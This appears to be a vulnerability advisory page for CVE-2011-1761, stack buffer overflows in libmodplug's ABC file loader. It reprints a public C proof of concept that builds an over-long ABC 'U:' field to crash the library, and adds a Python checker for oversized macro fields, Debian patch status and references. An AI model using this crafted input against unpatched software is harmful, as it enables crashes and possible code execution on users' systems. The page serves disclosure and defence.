CVE-2011-1761
Description
Multiple stack-based buffer overflows in the (1) abc_new_macro and (2) abc_new_umacro functions in src/load_abc.cpp in libmodplug before 0.8.8.3 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted ABC file. NOTE: some of these details are obtained from third party information.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)
```c
#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>

/*
libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc
http://modplug-xmms.sourceforge.net/
by: epiphant
this exploits one of many overflows in load_abc.cpp lol
vlc media player uses libmodplug
greets: defrost, babi, ming_wisher, emel1a, a.v., krs
date: 28 april 2011
tested on: centos 5.6
*/

int main(void)
{
    /* Minimal ABC header: a tune number, then a "U:" user-symbol field whose
       body is padded well past what the loader's fixed-size stack buffer holds. */
    char test[512] = "X: 1\nU: ";
    unsigned int i;

    i = strlen(test);
    while (i < 278)
        test[i++] = 'Q';
    test[i++] = '1' + 32;   /* '1' + 32 == 'Q' */
    test[i++] = '3';
    test[i++] = '3';
    test[i++] = '4';
    while (i < 286)
        test[i++] = 'A';
    test[i++] = '\n';
    test[i] = '\0';

    /* The rest is an ordinary-looking tune so the file still parses as ABC. */
    strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
    strcat(test, "Z: 3 Doors Down\n");
    strcat(test, "L: 1/4\n");
    strcat(test, "Q: 108\n");
    strcat(test, "K: C\n\n");
    strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");

    i = strlen(test);
    ModPlug_Load(test, i);  /* the overflow is triggered inside the ABC loader */
    return 0;
}
```
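As an added defender-side example (not part of the Exploit-DB entry or of libmodplug itself), the following Python check flags ABC files whose macro-definition fields are long enough to reach the fixed stack buffers described above, so such files can be quarantined before an unpatched libmodplug sees them. The 200-byte threshold and the mapping of the `m:` and `U:` fields to abc_new_macro and abc_new_umacro are assumptions; the page names only the functions.

```python
import re
from typing import List, Tuple, Union

# Assumed conservative limit for the body of an ABC macro field. The exact sizes of
# the stack buffers in abc_new_macro / abc_new_umacro are not given on the page;
# 200 bytes is a constructed threshold, well below the ~280-byte "U:" field the PoC builds.
MAX_FIELD_LEN = 200

# Assumed mapping (the page names only the functions): "m:" is the ABC macro field
# parsed by abc_new_macro, "U:" the user-defined-symbol field parsed by abc_new_umacro.
HEADER_FIELD = re.compile(r"^([mU]):\s*(.*)$")
INLINE_FIELD = re.compile(r"\[([mU]):([^\]]*)\]")  # inline form such as [U:T=!trill!]


def find_oversized_macro_fields(abc_data: Union[bytes, str],
                                limit: int = MAX_FIELD_LEN) -> List[Tuple[int, str, int]]:
    """Return (line_number, field, body_length) for every m:/U: field longer than limit.

    Crafted files need not be valid text, so bytes are decoded as latin-1 (one byte
    per character) to keep the measured lengths equal to the on-disk byte counts.
    """
    text = abc_data.decode("latin-1") if isinstance(abc_data, bytes) else abc_data
    hits: List[Tuple[int, str, int]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        header = HEADER_FIELD.match(line)
        if header:
            fields = [(header.group(1), header.group(2))]
        else:
            fields = [(m.group(1), m.group(2)) for m in INLINE_FIELD.finditer(line)]
        for field, body in fields:
            if len(body) > limit:
                hits.append((lineno, field, len(body)))
    return hits


def is_suspicious(abc_data: Union[bytes, str]) -> bool:
    """True when the file should be quarantined rather than handed to an unpatched libmodplug."""
    return bool(find_oversized_macro_fields(abc_data))


# Constructed samples: a header shaped like the PoC above (one ~280-byte U: line) and a benign tune.
MALICIOUS_ABC = b"X: 1\nU: " + b"Q" * 280 + b"\nK: C\n"
BENIGN_ABC = "X: 1\nT: Scale\nU: T = !trill!\nK: C\nCDEF GABc|\n"

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_ABC), ("benign", BENIGN_ABC)):
        print(name, find_oversized_macro_fields(sample))
```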
OS impact
Debian: fixed in 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 1:0.8.8.4-1 |
| sid | Fixed | 1:0.8.8.4-1 |
| forky | Fixed | 1:0.8.8.4-1 |
| bullseye | Fixed | 1:0.8.8.4-1 |
| bookworm | Fixed | 1:0.8.8.4-1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| konstanty_bialkowski | libmodplug | <= 0.8.8.2 | |
| konstanty_bialkowski | libmodplug | 0.8 | |
| konstanty_bialkowski | libmodplug | 0.8.4 | |
| konstanty_bialkowski | libmodplug | 0.8.5 | |
| konstanty_bialkowski | libmodplug | 0.8.6 | |
| konstanty_bialkowski | libmodplug | 0.8.7 | |
| konstanty_bialkowski | libmodplug | 0.8.8 | |
| konstanty_bialkowski | libmodplug | 0.8.8.1 | |
References
- http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060520.html
- http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html
- http://secunia.com/advisories/44388
- http://secunia.com/advisories/44695
- http://secunia.com/advisories/44870
- http://secunia.com/advisories/45742
- http://secunia.com/advisories/48058
- http://ubuntu.com/usn/usn-1148-1
- http://www.debian.org/security/2012/dsa-2415
- http://www.exploit-db.com/exploits/17222
- http://www.openwall.com/lists/oss-security/2011/05/02/1
- http://www.openwall.com/lists/oss-security/2011/05/02/19
- http://www.osvdb.org/72157
- https://security-tracker.debian.org/tracker/CVE-2011-1761
CWEs
CWE-119